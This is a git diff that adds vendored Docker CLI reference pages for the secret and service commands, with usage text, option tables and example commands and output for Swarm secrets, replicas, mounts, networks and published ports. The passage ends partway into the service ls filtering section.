8 [OK] diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md new file mode 100644 index 0000000000..aebcebbcdd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md @@ -0,0 +1,90 @@ +--- +title: "secret create" +description: "The secret create command description and usage" +keywords: ["secret, create"] +--- + + + +# secret create + +```Markdown +Usage: docker secret create [OPTIONS] SECRET file|- + +Create a secret from a file or STDIN as content + +Options: + --help Print usage + -l, --label list Secret labels (default []) +``` + +Creates a secret using standard input or from a file for the secret content. You must run this +command on a manager node. + +## Examples + +### Create a secret + +```bash +$ echo | docker secret create my_secret - +mhv17xfe3gh6xc4rij5orpfds + +$ docker secret ls +ID NAME CREATED UPDATED SIZE +mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 +``` + +### Create a secret with a file + +```bash +$ docker secret create my_secret ./secret.json +mhv17xfe3gh6xc4rij5orpfds + +$ docker secret ls +ID NAME CREATED UPDATED SIZE +mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 +``` + +### Create a secret with labels + +```bash +$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json +jtn7g6aukl5ky7nr9gvwafoxh + +$ docker secret inspect my_secret +[ + { + "ID": "jtn7g6aukl5ky7nr9gvwafoxh", + "Version": { + "Index": 541 + }, + "CreatedAt": "2016-11-03T20:54:12.924766548Z", + "UpdatedAt": "2016-11-03T20:54:12.924766548Z", + "Spec": { + "Name": "my_secret", + "Labels": { + "env": "dev", + "rev": "20161102" + }, + "Data": null + }, + "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387", + "SecretSize": 
1679 + } +] + +``` + + +## Related information + +* [secret inspect](secret_inspect.md) +* [secret ls](secret_ls.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md new file mode 100644 index 0000000000..de878f74e4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md @@ -0,0 +1,85 @@ +--- +title: "secret inspect" +description: "The secret inspect command description and usage" +keywords: ["secret, inspect"] +--- + + + +# secret inspect + +```Markdown +Usage: docker secret inspect [OPTIONS] SECRET [SECRET...] + +Display detailed information on one or more secrets + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + + +Inspects the specified secret. This command has to be run targeting a manager +node. + +By default, this renders all results in a JSON array. If a format is specified, +the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +### Inspecting a secret by name or ID + +You can inspect a secret, either by its *name*, or *ID* + +For example, given the following secret: + +```bash +$ docker secret ls +ID NAME CREATED UPDATED +mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC +``` + +```bash +$ docker secret inspect secret.json +[ + { + "ID": "mhv17xfe3gh6xc4rij5orpfds", + "Version": { + "Index": 1198 + }, + "CreatedAt": "2016-10-27T23:25:43.909181089Z", + "UpdatedAt": "2016-10-27T23:25:43.909181089Z", + "Spec": { + "Name": "secret.json" + } + } +] +``` + +### Formatting secret output + +You can use the --format option to obtain specific information about a +secret. 
The following example command outputs the creation time of the +secret. + +```bash{% raw %} +$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds +2016-10-27 23:25:43.909181089 +0000 UTC +{% endraw %}``` + + +## Related information + +* [secret create](secret_create.md) +* [secret ls](secret_ls.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md new file mode 100644 index 0000000000..6b34fc2146 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md @@ -0,0 +1,43 @@ +--- +title: "secret ls" +description: "The secret ls command description and usage" +keywords: ["secret, ls"] +--- + + + +# secret ls + +```Markdown +Usage: docker secret ls [OPTIONS] + +List secrets + +Aliases: + ls, list + +Options: + -q, --quiet Only display IDs +``` + +Run this command on a manager node to list the secrets in the Swarm. + +## Examples + +```bash +$ docker secret ls +ID NAME CREATED UPDATED +mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC +``` +## Related information + +* [secret create](secret_create.md) +* [secret inspect](secret_inspect.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md new file mode 100644 index 0000000000..f504b1ba4f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md @@ -0,0 +1,48 @@ +--- +title: "secret rm" +description: "The secret rm command description and usage" +keywords: ["secret, rm"] +--- + + + +# secret rm + +```Markdown +Usage: docker secret rm SECRET [SECRET...] + +Remove one or more secrets + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes the specified secrets from the swarm. 
This command has to be run +targeting a manager node. + +This example removes a secret: + +```bash +$ docker secret rm secret.json +sapth4csdo5b6wz2p5uimh5xg +``` + +> **Warning**: Unlike `docker rm`, this command does not ask for confirmation +> before removing a secret. + + +## Related information + +* [secret create](secret_create.md) +* [secret inspect](secret_inspect.md) +* [secret ls](secret_ls.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md new file mode 100644 index 0000000000..c9e298096b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md @@ -0,0 +1,556 @@ +--- +title: "service create" +description: "The service create command description and usage" +keywords: "service, create" +--- + + + +# service create + +```Markdown +Usage: docker service create [OPTIONS] IMAGE [COMMAND] [ARG...] + +Create a new service + +Options: + --constraint list Placement constraints (default []) + --container-label list Container labels (default []) + --dns list Set custom DNS servers (default []) + --dns-option list Set DNS options (default []) + --dns-search list Set custom DNS search domains (default []) + --endpoint-mode string Endpoint mode (vip or dnsrr) + -e, --env list Set environment variables (default []) + --env-file list Read in a file of environment variables (default []) + --group list Set one or more supplementary user groups for the container (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) + --help Print usage + --host list Set one or more custom host-to-IP mappings (host:ip) (default []) + --hostname string Container hostname + -l, --label list 
Service labels (default []) + --limit-cpu decimal Limit CPUs (default 0.000) + --limit-memory bytes Limit Memory (default 0 B) + --log-driver string Logging driver for service + --log-opt list Logging driver options (default []) + --mode string Service mode (replicated or global) (default "replicated") + --mount mount Attach a filesystem mount to the service + --name string Service name + --network list Network attachments (default []) + --no-healthcheck Disable any container-specified HEALTHCHECK + -p, --publish port Publish a port as a node port + --replicas uint Number of tasks + --reserve-cpu decimal Reserve CPUs (default 0.000) + --reserve-memory bytes Reserve Memory (default 0 B) + --restart-condition string Restart when condition is met (none, on-failure, or any) + --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) + --restart-max-attempts uint Maximum number of restarts before giving up + --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) + --secret secret Specify secrets to expose to the service + --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) + -t, --tty Allocate a pseudo-TTY + --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) + --update-failure-action string Action on update failure (pause|continue) (default "pause") + --update-max-failure-ratio float Failure rate to tolerate during an update + --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) + --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) + -u, --user string Username or UID (format: [:]) + --with-registry-auth Send registry authentication details to swarm agents + -w, --workdir string Working directory inside the container +``` + +Creates a service as described by the specified parameters. You must run this +command on a manager node. 
+ +## Examples + +### Create a service + +```bash +$ docker service create --name redis redis:3.0.6 +dmu1ept4cxcfe8k8lhtux3ro3 + +$ docker service create --mode global --name redis2 redis:3.0.6 +a8q9dasaafudfs8q8w32udass + +$ docker service ls +ID NAME MODE REPLICAS IMAGE +dmu1ept4cxcf redis replicated 1/1 redis:3.0.6 +a8q9dasaafud redis2 global 1/1 redis:3.0.6 +``` + +### Create a service with 5 replica tasks (--replicas) + +Use the `--replicas` flag to set the number of replica tasks for a replicated +service. The following command creates a `redis` service with `5` replica tasks: + +```bash +$ docker service create --name redis --replicas=5 redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +The above command sets the *desired* number of tasks for the service. Even +though the command returns immediately, actual scaling of the service may take +some time. The `REPLICAS` column shows both the *actual* and *desired* number +of replica tasks for the service. + +In the following example the desired state is `5` replicas, but the current +number of `RUNNING` tasks is `3`: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +4cdgfyky7ozw redis replicated 3/5 redis:3.0.7 +``` + +Once all the tasks are created and `RUNNING`, the actual number of tasks is +equal to the desired number: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +4cdgfyky7ozw redis replicated 5/5 redis:3.0.7 +``` + +### Create a service with secrets +Use the `--secret` flag to give a container access to a +[secret](secret_create.md). 
+ +Create a service specifying a secret: + +```bash +$ docker service create --name redis --secret secret.json redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +Create a service specifying the secret, target, user/group ID and mode: + +```bash +$ docker service create --name redis \ + --secret source=ssh-key,target=ssh \ + --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \ + redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +Secrets are located in `/run/secrets` in the container. If no target is +specified, the name of the secret will be used as the in memory file in the +container. If a target is specified, that will be the filename. In the +example above, two files will be created: `/run/secrets/ssh` and +`/run/secrets/app` for each of the secret targets specified. + +### Create a service with a rolling update policy + +```bash +$ docker service create \ + --replicas 10 \ + --name redis \ + --update-delay 10s \ + --update-parallelism 2 \ + redis:3.0.6 +``` + +When you run a [service update](service_update.md), the scheduler updates a +maximum of 2 tasks at a time, with `10s` between updates. For more information, +refer to the [rolling updates +tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/). + +### Set environment variables (-e, --env) + +This sets environmental variables for all tasks in a service. For example: + +```bash +$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6 +``` + +### Create a docker service with specific hostname (--hostname) + +This option sets the docker service containers hostname to a specific string. For example: +```bash +$ docker service create --name redis --hostname myredis redis:3.0.6 +``` +### Set metadata on a service (-l, --label) + +A label is a `key=value` pair that applies metadata to a service. 
To label a +service with two labels: + +```bash +$ docker service create \ + --name redis_2 \ + --label com.example.foo="bar" + --label bar=baz \ + redis:3.0.6 +``` + +For more information about labels, refer to [apply custom +metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). + +### Add bind-mounts or volumes + +Docker supports two different kinds of mounts, which allow containers to read to +or write from files or directories on other containers or the host operating +system. These types are _data volumes_ (often referred to simply as volumes) and +_bind-mounts_. + +Additionally, Docker also supports tmpfs mounts. + +A **bind-mount** makes a file or directory on the host available to the +container it is mounted within. A bind-mount may be either read-only or +read-write. For example, a container might share its host's DNS information by +means of a bind-mount of the host's `/etc/resolv.conf` or a container might +write logs to its host's `/var/log/myContainerLogs` directory. If you use +bind-mounts and your host and containers have different notions of permissions, +access controls, or other such details, you will run into portability issues. + +A **named volume** is a mechanism for decoupling persistent data needed by your +container from the image used to create the container and from the host machine. +Named volumes are created and managed by Docker, and a named volume persists +even when no container is currently using it. Data in named volumes can be +shared between a container and the host machine, as well as between multiple +containers. Docker uses a _volume driver_ to create, manage, and mount volumes. +You can back up or restore volumes using Docker commands. + +A **tmpfs** mounts a tmpfs inside a container for volatile data. + +Consider a situation where your image starts a lightweight web server. You could +use that image as a base image, copy in your website's HTML files, and package +that into another image. 
Each time your website changed, you'd need to update +the new image and redeploy all of the containers serving your website. A better +solution is to store the website in a named volume which is attached to each of +your web server containers when they start. To update the website, you just +update the named volume. + +For more information about named volumes, see +[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/). + +The following table describes options which apply to both bind-mounts and named +volumes in a service: + +| Option | Required | Description +|:-----------------------------------------|:--------------------------|:----------------------------------------------------------------------------------------- +| **type** | | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.

  • `volume`: mounts a [managed volume](volume_create.md) into the container.
  • `bind`: bind-mounts a directory or file from the host into the container.
  • `tmpfs`: mounts a tmpfs in the container.
+| **src** or **source** | for `type=bind` only |
  • `type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).
  • `type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`). An error is produced if the file or directory does not exist.
  • `type=tmpfs`: `src` is not supported.
+| **dst** or **destination** or **target** | yes | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount. +| **readonly** or **ro** | | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.

  • `true` or `1` or no value: Mounts the bind or volume read-only.
  • `false` or `0`: Mounts the bind or volume read-write.
+
+#### Bind Propagation
+
+Bind propagation refers to whether or not mounts created within a given
+bind-mount or named volume can be propagated to replicas of that mount. Consider
+a mount point `/mnt`, which is also mounted on `/tmp`. The propagation settings
+control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each
+propagation setting has a recursive counterpoint. In the case of recursion,
+consider that `/tmp/a` is also mounted as `/foo`. The propagation settings
+control whether `/mnt/a` and/or `/tmp/a` would exist.
+
+The `bind-propagation` option defaults to `rprivate` for both bind-mounts and
+volume mounts, and is only configurable for bind-mounts. In other words, named
+volumes do not support bind propagation.
+
+- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts,
+  and sub-mounts of replica mounts are also propagated to the
+  original mount.
+- **`slave`**: similar to a shared mount, but only in one direction. If the
+  original mount exposes a sub-mount, the replica mount can see it.
+  However, if the replica mount exposes a sub-mount, the original
+  mount cannot see it.
+- **`private`**: The mount is private. Sub-mounts within it are not exposed to
+  replica mounts, and sub-mounts of replica mounts are not
+  exposed to the original mount.
+- **`rshared`**: The same as shared, but the propagation also extends to and from
+  mount points nested within any of the original or replica mount
+  points.
+- **`rslave`**: The same as `slave`, but the propagation also extends to and from
+  mount points nested within any of the original or replica mount
+  points.
+- **`rprivate`**: The default. The same as `private`, meaning that no mount points
+  anywhere within the original or replica mount points propagate
+  in either direction.
+
+For more information about bind propagation, see the
+[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt).
+
+#### Options for Named Volumes
+The following options can only be used for named volumes (`type=volume`):
+
+| Option                | Description
+|:----------------------|:--------------------------------------------------------------------------------------------------------------------
+| **volume-driver**     | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist.
+| **volume-label**      | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
+| **volume-nocopy**     | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disable copying files from the container's filesystem to the volume and mount the empty volume.

A value is optional:
  • `true` or `1`: Default if you do not provide a value. Disables copying.
  • `false` or `0`: Enables copying.
+| **volume-opt** | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation. + +#### Options for tmpfs +The following options can only be used for tmpfs mounts (`type=tmpfs`); + +| Option | Description +|:----------------------|:-------------------------------------------------------------------------------------------------------------------- +| **tmpfs-size** | Size of the tmpfs mount in bytes. Unlimited by default in Linux. +| **tmpfs-mode** | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux. + +#### Differences between "--mount" and "--volume" + +The `--mount` flag supports most options that are supported by the `-v` +or `--volume` flag for `docker run`, with some important exceptions: + +- The `--mount` flag allows you to specify a volume driver and volume driver + options *per volume*, without creating the volumes in advance. In contrast, + `docker run` allows you to specify a single volume driver which is shared + by all volumes, using the `--volume-driver` flag. + +- The `--mount` flag allows you to specify custom metadata ("labels") for a volume, + before the volume is created. + +- When you use `--mount` with `type=bind`, the host-path must refer to an *existing* + path on the host. The path will not be created for you and the service will fail + with an error if the path does not exist. + +- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags, + which are used for `selinux` labeling. 
+ +#### Create a service using a named volume + +The following example creates a service that uses a named volume: + +```bash +$ docker service create \ + --name my-service \ + --replicas 3 \ + --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \ + nginx:alpine +``` + +For each replica of the service, the engine requests a volume named "my-volume" +from the default ("local") volume driver where the task is deployed. If the +volume does not exist, the engine creates a new volume and applies the "color" +and "shape" labels. + +When the task is started, the volume is mounted on `/path/in/container/` inside +the container. + +Be aware that the default ("local") volume is a locally scoped volume driver. +This means that depending on where a task is deployed, either that task gets a +*new* volume named "my-volume", or shares the same "my-volume" with other tasks +of the same service. Multiple containers writing to a single shared volume can +cause data corruption if the software running inside the container is not +designed to handle concurrent processes writing to the same location. Also take +into account that containers can be re-scheduled by the Swarm orchestrator and +be deployed on a different node. + +#### Create a service that uses an anonymous volume + +The following command creates a service with three replicas with an anonymous +volume on `/path/in/container`: + +```bash +$ docker service create \ + --name my-service \ + --replicas 3 \ + --mount type=volume,destination=/path/in/container \ + nginx:alpine +``` + +In this example, no name (`source`) is specified for the volume, so a new volume +is created for each task. This guarantees that each task gets its own volume, +and volumes are not shared between tasks. Anonymous volumes are removed after +the task using them is complete. 
+ +#### Create a service that uses a bind-mounted host directory + +The following example bind-mounts a host directory at `/path/in/container` in +the containers backing the service: + +```bash +$ docker service create \ + --name my-service \ + --mount type=bind,source=/path/on/host,destination=/path/in/container \ + nginx:alpine +``` + +### Set service mode (--mode) + +The service mode determines whether this is a _replicated_ service or a _global_ +service. A replicated service runs as many tasks as specified, while a global +service runs on each active node in the swarm. + +The following command creates a global service: + +```bash +$ docker service create \ + --name redis_2 \ + --mode global \ + redis:3.0.6 +``` + +### Specify service constraints (--constraint) + +You can limit the set of nodes where a task can be scheduled by defining +constraint expressions. Multiple constraints find nodes that satisfy every +expression (AND match). Constraints can match node or Docker Engine labels as +follows: + +| node attribute | matches | example | +|:----------------|:--------------------------|:------------------------------------------------| +| node.id | node ID | `node.id == 2ivku8v2gvtg4` | +| node.hostname | node hostname | `node.hostname != node-2` | +| node.role | node role: manager | `node.role == manager` | +| node.labels | user defined node labels | `node.labels.security == high` | +| engine.labels | Docker Engine's labels | `engine.labels.operatingsystem == ubuntu 14.04` | + +`engine.labels` apply to Docker Engine labels like operating system, +drivers, etc. Swarm administrators add `node.labels` for operational purposes by +using the [`docker node update`](node_update.md) command. 
+ +For example, the following limits tasks for the redis service to nodes where the +node type label equals queue: + +```bash +$ docker service create \ + --name redis_2 \ + --constraint 'node.labels.type == queue' \ + redis:3.0.6 +``` + +### Attach a service to an existing network (--network) + +You can use overlay networks to connect one or more services within the swarm. + +First, create an overlay network on a manager node the docker network create +command: + +```bash +$ docker network create --driver overlay my-network + +etjpu59cykrptrgw0z0hk5snf +``` + +After you create an overlay network in swarm mode, all manager nodes have +access to the network. + +When you create a service and pass the --network flag to attach the service to +the overlay network: + +```bash +$ docker service create \ + --replicas 3 \ + --network my-network \ + --name my-web \ + nginx + +716thylsndqma81j6kkkb5aus +``` + +The swarm extends my-network to each node running the service. + +Containers on the same network can access each other using +[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery). + +### Publish service ports externally to the swarm (-p, --publish) + +You can publish service ports to make them available externally to the swarm +using the `--publish` flag: + +```bash +$ docker service create --publish : nginx +``` + +For example: + +```bash +$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx +``` + +When you publish a service port, the swarm routing mesh makes the service +accessible at the target port on every node regardless if there is a task for +the service running on the node. For more information refer to +[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/). + +### Publish a port for TCP only or UDP only + +By default, when you publish a port, it is a TCP port. You can +specifically publish a UDP port instead of or in addition to a TCP port. 
When
+you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to
+add the suffix `/tcp` for TCP ports. Otherwise it is optional.
+
+#### TCP only
+
+The following two commands are equivalent.
+
+```bash
+$ docker service create --name dns-cache -p 53:53 dns-cache
+
+$ docker service create --name dns-cache -p 53:53/tcp dns-cache
+```
+
+#### TCP and UDP
+
+```bash
+$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache
+```
+
+#### UDP only
+
+```bash
+$ docker service create --name dns-cache -p 53:53/udp dns-cache
+```
+
+### Create services using templates
+
+You can use templates for some flags of `service create`, using the syntax
+provided by Go's [text/template](http://golang.org/pkg/text/template/) package.
+
+The supported flags are the following:
+
+- `--hostname`
+- `--mount`
+- `--env`
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder       | Description
+----------------- | --------------------------------------------
+`.Service.ID`     | Service ID
+`.Service.Name`   | Service name
+`.Service.Labels` | Service labels
+`.Node.ID`        | Node ID
+`.Task.ID`        | Task ID
+`.Task.Name`      | Task name
+`.Task.Slot`      | Task slot
+
+#### Template example
+
+In this example, we are going to set the template of the created containers based on the
+service's name and the node's ID where it sits.
+ +```bash +$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top +va8ew30grofhjoychbr6iot8c + +$ docker service ps va8ew30grofhjoychbr6iot8c +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +wo41w8hg8qan hosttempl.1 busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912 2e7a8a9c4da2 Running Running about a minute ago + +$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj +x3ti0erg11rjpg64m75kej2mz-hosttempl +``` + +## Related information + +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) + + diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md new file mode 100644 index 0000000000..8b4ab62d89 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md @@ -0,0 +1,162 @@ +--- +title: "service inspect" +description: "The service inspect command description and usage" +keywords: "service, inspect" +--- + + + +# service inspect + +```Markdown +Usage: docker service inspect [OPTIONS] SERVICE [SERVICE...] + +Display detailed information on one or more services + +Options: + -f, --format string Format the output using the given Go template + --help Print usage + --pretty Print the information in a human friendly format. +``` + + +Inspects the specified service. This command has to be run targeting a manager +node. + +By default, this renders all results in a JSON array. If a format is specified, +the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. 
+ +## Examples + +### Inspecting a service by name or ID + +You can inspect a service, either by its *name*, or *ID* + +For example, given the following service; + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 +``` + +Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf` +produce the same result: + +```bash +$ docker service inspect redis +[ + { + "ID": "dmu1ept4cxcfe8k8lhtux3ro3", + "Version": { + "Index": 12 + }, + "CreatedAt": "2016-06-17T18:44:02.558012087Z", + "UpdatedAt": "2016-06-17T18:44:02.558012087Z", + "Spec": { + "Name": "redis", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis:3.0.6" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": {}, + "EndpointSpec": { + "Mode": "vip" + } + }, + "Endpoint": { + "Spec": {} + } + } +] +``` + +```bash +$ docker service inspect dmu1ept4cxcf +[ + { + "ID": "dmu1ept4cxcfe8k8lhtux3ro3", + "Version": { + "Index": 12 + }, + ... + } +] +``` + +### Inspect a service using pretty-print + +You can print the inspect output in a human-readable format instead of the default +JSON output, by using the `--pretty` option: + +```bash +$ docker service inspect --pretty frontend +ID: c8wgl7q4ndfd52ni6qftkvnnp +Name: frontend +Labels: + - org.example.projectname=demo-app +Service Mode: REPLICATED + Replicas: 5 +Placement: +UpdateConfig: + Parallelism: 0 +ContainerSpec: + Image: nginx:alpine +Resources: +Endpoint Mode: vip +Ports: + Name = + Protocol = tcp + TargetPort = 443 + PublishedPort = 4443 +``` + +You can also use `--format pretty` for the same effect. + + +### Finding the number of tasks running as part of a service + +The `--format` option can be used to obtain specific information about a +service. 
For example, the following command outputs the number of replicas +of the "redis" service. + +```bash{% raw %} +$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis +10 +{% endraw %}``` + + +## Related information + +* [service create](service_create.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md new file mode 100644 index 0000000000..fdf6a3a245 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md @@ -0,0 +1,77 @@ +--- +title: "service logs (experimental)" +description: "The service logs command description and usage" +keywords: "service, logs" +advisory: "experimental" +--- + + + +# service logs + +```Markdown +Usage: docker service logs [OPTIONS] SERVICE + +Fetch the logs of a service + +Options: + --details Show extra details provided to logs + -f, --follow Follow log output + --help Print usage + --since string Show logs since timestamp + --tail string Number of lines to show from the end of the logs (default "all") + -t, --timestamps Show timestamps +``` + +The `docker service logs` command batch-retrieves logs present at the time of execution. + +> **Note**: this command is only functional for services that are started with +> the `json-file` or `journald` logging driver. + +For more information about selecting and configuring logging drivers, refer to +[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). + +The `docker service logs --follow` command will continue streaming the new output from +the service's `STDOUT` and `STDERR`. + +Passing a negative number or a non-integer to `--tail` is invalid and the +value is set to `all` in that case. 
+ +The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) +, for example `2014-09-16T06:17:46.000000000Z`, to each +log entry. To ensure that the timestamps are aligned the +nano-second part of the timestamp will be padded with zero when necessary. + +The `docker service logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +service. + +The `--since` option shows only the service logs generated after +a given date. You can specify the date as an RFC 3339 date, a UNIX +timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date +format you may also use RFC3339Nano, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. You can combine the +`--since` option with either or both of the `--follow` or `--tail` options. 
+ +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md new file mode 100644 index 0000000000..ccd68af750 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md @@ -0,0 +1,114 @@ +--- +title: "service ls" +description: "The service ls command description and usage" +keywords: "service, ls" +--- + + + +# service ls + +```Markdown +Usage: docker service ls [OPTIONS] + +List services + +Aliases: + ls, list + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +This command when run targeting a manager, lists services are running in the +swarm. + +On a manager node: +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +c8wgl7q4ndfd frontend replicated 5/5 nginx:alpine +dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 +iwe3278osahj mongo global 7/7 mongo:3.3 +``` + +The `REPLICAS` column shows both the *actual* and *desired* number of tasks for +the service. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [id](service_ls.md#id) +* [label](service_ls.md#label) +* [name](service_ls.md#name) + +#### ID + +The `id` filter matches all or part of a service's id. 